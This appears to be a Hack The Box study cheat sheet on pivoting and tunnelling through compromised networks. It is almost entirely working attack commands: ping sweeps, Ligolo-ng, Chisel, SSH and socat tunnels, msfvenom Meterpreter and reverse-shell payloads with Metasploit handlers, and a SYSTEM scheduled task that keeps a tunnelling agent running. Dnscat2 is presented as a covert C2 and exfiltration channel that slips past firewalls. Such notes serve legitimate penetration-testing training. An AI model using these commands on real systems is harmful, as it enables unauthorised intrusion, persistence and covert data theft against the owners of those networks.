Portforwarding and tunneling

Commands to enumerate internal networks

PS C:\> Get-NetNeighbor -AddressFamily IPv4
PS C:\> Test-NetConnection -ComputerName 192.168.210.13 -Port 443
PS C:\> Test-WSMan -ComputerName 192.168.1.10
PS C:\> arp -a
PS C:\> route print

Intrusionz3r0X@htb[/htb]$ arp -n
Intrusionz3r0X@htb[/htb]$ route -4

Ping Sweep

Intrusionz3r0X@htb[/htb]$ for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done
C:\\>  for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 | find "Reply"
PS C:\\> 1..254 | % { $ip="192.168.210.$_"; if (Test-Connection -Count 1 -ComputerName $ip -Quiet) { "$ip`: True" } }
meterpreter > run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23

Ligolo NG

#Start the server Proxy
Intrusionz3r0X@htb[/htb]$ sudo ./proxy -selfcert -laddr 10.10.14.3:443

#Create the interface
ligolo-ng >> interface_create --name "ligolo" #Inside the proxy agent

#Connect the agent to our proxy server
Target@htb[/htb]$ ./agent -connect <ip-address>:<port> -ignore-cert

#Switch beetween session
ligolo-ng >> session

#Check the Network configuration and identify the subnet
ligolo-ng >> ifconfig

#Create the entry 
ligolo-ng >> interface_add_route --name ligolo --route x.x.x.x/24 #Inside the proxy agent

#Start the tunneling
[ligolo-ng >> tunnel_start --tun ligolo

Configure double pivoting

You have to create for each pivot a new interface and specify the subnet to reach either /24 to access the entire subnet or /32 for specific host.

Note: --addr parameter port has to increase on one to facilitate the manage of all tunnels

#Create new interface for the new pivot host
ligolo-ng >> interface_create --name "ligolo2" #Inside the proxy agent

#Set up Listener
ligolo-ng >> listener_add --addr 0.0.0.0:1160x --to 127.0.0.1:11601 --tcp
ligolo-ng >> listener_list 
Target@htb[/htb]$ ./agent -connect <subnet-ip-address-previous-pivot>:11601  -ignore-cert

#Switch beetween session
ligolo-ng >> session

#Check the Network configuration and identify the subnet
ligolo-ng >> ifconfig

#Start the tunneling
[ligolo-ng >> tunnel_start --tun ligolo2

#Create the entry 
ligolo-ng >> interface_add_route --name ligolo2 --route x.x.x.x/xx #Inside the proxy agent

For unstable Sessions:

schtasks /create /tn "MyAgentTask3" /tr "C:\Temp\agent.exe -connect 192.168.110.51:9000 -ignore-cert" /sc once /st (Get-Date).AddMinutes(1).ToString("HH:mm") /ru SYSTEM
nohup ./agent -connect 192.168.110.55:9001 -ignore-cert > agent.log 2>&1

Chisel

#The Chisel listener will listen for incoming connections on port 1234 using SOCKS5 (--socks5) and forward it to all the networks that are accessible from the pivot host.
target@WEB01:~$ ./chisel server -v -p 1234 --socks5
Intrusionz3r0X@htb[/htb]$ ./chisel client -v 10.129.202.64:1234 socks

#If there is a firewall restrict inbound connection use reverse tunneling
Intrusionz3r0X@htb[/htb]$ sudo ./chisel server --reverse -v -p 1234 --socks5
target@WEB01$ ./chisel client -v 10.10.14.17:1234 R:socks

Chisel double pivoting

Kali Linux:

#Setting up the server
❯ ./chisel server --reverse --socks5 -p 9001 -v #Intrusionz3r0 Machine

Modify the

#add the line one at the time and as you go otherwise the proxy doesn't work
socks5 127.0.0.1 1080
socks5 127.0.0.1 1090

#Now close any Socks4 connection (e.g. SSH Dynamic Port Forward) and comment in /etc/proxychains
#socks4 127.0.0.1 9050

Pivot Host:

PS C:\Windows\System32\Spool\Drivers\Color> .\chisel.exe client -v myip:9001 R:socks 
PS C:\Windows\System32\Spool\Drivers\Color> .\chisel.exe server -v -p 9002 --reverse socks5

Pivot Host 2:

*Evil-WinRM* PS C:\Users\Administrator\Documents> .\chisel.exe client PivotHostIP:9002 R:1090:socks 

Scan the entire IP list one line

Target@htb[/htb]$ wget https://github.com/andrew-d/static-binaries/raw/refs/heads/master/binaries/linux/x86_64/nmap
Target@htb[/htb]$ chmod +x nmap
Target@htb[/htb]$ cat alive_host.txt 
192.168.110.1
192.168.110.51
192.168.110.52
192.168.110.53
192.168.110.54
192.168.110.55
Target@htb[/htb]$ cat alive_host.txt | while read ip; do (./nmap -p- --open -Pn -n -T5 --min-rate 3000 -vvv -oG "${ip}_tcp_allports" $ip);done

Local Port Forwarding over SSH

#Local Port Forwarding over SSH
Intrusionz3r0X@htb[/htb]$ ssh -L 1234:localhost:3306 ubuntu@10.129.202.64
Intrusionz3r0X@htb[/htb]$ ssh -L 1234:localhost:3306 -L 8080:localhost:80 ubuntu@10.129.202.64

#Dynamic SSH tunneling over SOCKS proxy
Intrusionz3r0X@htb[/htb]$ ssh -D 9050 ubuntu@10.129.202.64 

Remote/Reverse Port Forwarding with SSH

#Remote/Reverse Port Forwarding with SSH
Intrusionz3r0X@htb[/htb]$ msfvenom -p windows/x64/meterpreter/reverse_https lhost= <InternalIPofPivotHost> -f exe -o backupscript.exe LPORT=8080

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
msf6 exploit(multi/handler) > set lhost 0.0.0.0
msf6 exploit(multi/handler) > set lport 8000
msf6 exploit(multi/handler) > run

Intrusionz3r0X@htb[/htb]$ ssh -R <InternalIPofPivotHost>:8080:0.0.0.0:8000 ubuntu@<ipAddressofTarget> -vN

#Execute payload

Meterpreter Tunneling & Port Forwarding

#Meterpreter Tunneling & Port Forwarding
Intrusionz3r0X@htb[/htb]$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.18 -f elf -o backupjob LPORT=8080

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set lhost 0.0.0.0
msf6 exploit(multi/handler) > set lport 8080
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
#(ctrl+z)

#Configuring MSF's SOCKS Proxy
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVPORT 9050
msf6 auxiliary(server/socks_proxy) > set SRVHOST 0.0.0.0
msf6 auxiliary(server/socks_proxy) > set version 4a
msf6 auxiliary(server/socks_proxy) > run

#Creating Routes with AutoRoute
msf6 > use post/multi/manage/autoroute
msf6 post(multi/manage/autoroute) > set SESSION 1
msf6 post(multi/manage/autoroute) > set SUBNET 172.16.5.0
msf6 post(multi/manage/autoroute) > run

#It is also possible to add routes with autoroute by running autoroute from the Meterpreter session.
meterpreter > run autoroute -s 172.16.5.0/23

#Listing Active Routes with AutoRoute
meterpreter > run autoroute -p

#Port Forwarding
meterpreter > portfwd add -l 3300 -p 3389 -r 172.16.5.19
#Reverse Port Forwarding
meterpreter > portfwd add -R -l 8081 -p 1234 -L 10.10.14.18

Socat

https://github.com/tech128/socat-1.7.3.0-windows

#Starting Socat Listener
ubuntu@Webserver:~$ socat TCP4-LISTEN:<intermediaryHostPort>,fork TCP4:10.10.14.18:<AttackhostPort>

#Socat Reverse shell
target@Webserver:~$ socat TCP4-LISTEN:8080,fork TCP4:10.10.14.18:443
Intrusionz3r0X@htb[/htb]$ msfvenom -p windows/shell_reverse_tcp LHOST=172.16.5.129 -f exe -o exploit.exe LPORT=8080

SSH Pivoting with Sshuttle

Intrusionz3r0X@htb[/htb]$ sudo apt-get install sshuttle
Intrusionz3r0X@htb[/htb]$ sudo sshuttle -r ubuntu@10.129.202.64 <ip-range> -v 

RPivot

Intrusionz3r0X@htb[/htb]$ git clone <https://github.com/klsecservices/rpivot.git>
Intrusionz3r0X@htb[/htb]$ sudo apt-get install python2.7

#Alternative to install python2.7
Intrusionz3r0X@htb[/htb]$ curl <https://pyenv.run> | bash
Intrusionz3r0X@htb[/htb]$ echo 'export PYENV_ROOT="$HOME/.pyenv"' >> ~/.bashrc
Intrusionz3r0X@htb[/htb]$ echo 'command -v pyenv >/dev/null || export PATH="$PYENV_ROOT/bin:$PATH"' >> ~/.bashrc
Intrusionz3r0X@htb[/htb]$ echo 'eval "$(pyenv init -)"' >> ~/.bashrc
Intrusionz3r0X@htb[/htb]$ source ~/.bashrc
Intrusionz3r0X@htb[/htb]$ pyenv install 2.7
Intrusionz3r0X@htb[/htb]$ pyenv shell 2.7

#Running server.py from the Attack Host
Intrusionz3r0X@htb[/htb]$ python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0

#Running the client.py to create the tunnerl socks
ubuntu@WEB01:~/rpivot$ python2.7 client.py --server-ip 10.10.14.18 --server-port 9999
#NTLM Authentication (If the internal network uses an HTTP proxy with NTLM authentication)
ubuntu@WEB01:~/rpivot$ python client.py --server-ip <IPaddressofTargetWebServer> --server-port 8080 --ntlm-proxy-ip <IPaddressofProxy> --ntlm-proxy-port 8081 --domain <nameofWindowsDomain> --username <username> --password <password>

Port Forwarding with Windows Netsh

C:\\Windows\\system32> netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.25
C:\\Windows\\system32> netsh.exe interface portproxy show v4tov4

DNS Tunneling with Dnscat2

DNS Tunneling with Dnscat2: Dnscat2 is a tool that allows data to be tunneled through the DNS protocol, using an encrypted command-and-control (C2) channel. By embedding data within DNS TXT records, it enables stealthy communication between an attacker's server and a compromised host. This method can bypass traditional network defenses like firewalls and intrusion detection systems, making it a potent tool for exfiltrating data and maintaining remote control over compromised systems in a covert manner.

Intrusionz3r0X@htb[/htb]$ git clone <https://github.com/iagox86/dnscat2.git>
Intrusionz3r0X@htb[/htb]$ sudo ruby dnscat2.rb --dns host=10.10.14.18,port=53,domain=inlanefreight.local --no-cache

#DNSCAT2 for windows
Intrusionz3r0X@htb[/htb]$ git clone <https://github.com/lukebaggett/dnscat2-powershell.git>
PS C:\\htb> Import-Module .\\dnscat2.ps1
PS C:\\htb> Start-Dnscat2 -DNSserver 10.10.14.18 -Domain inlanefreight.local -PreSharedSecret <secret> -Exec cmd

ICMP Tunneling

go build --ldflags '-linkmode external -extldflags "-static"'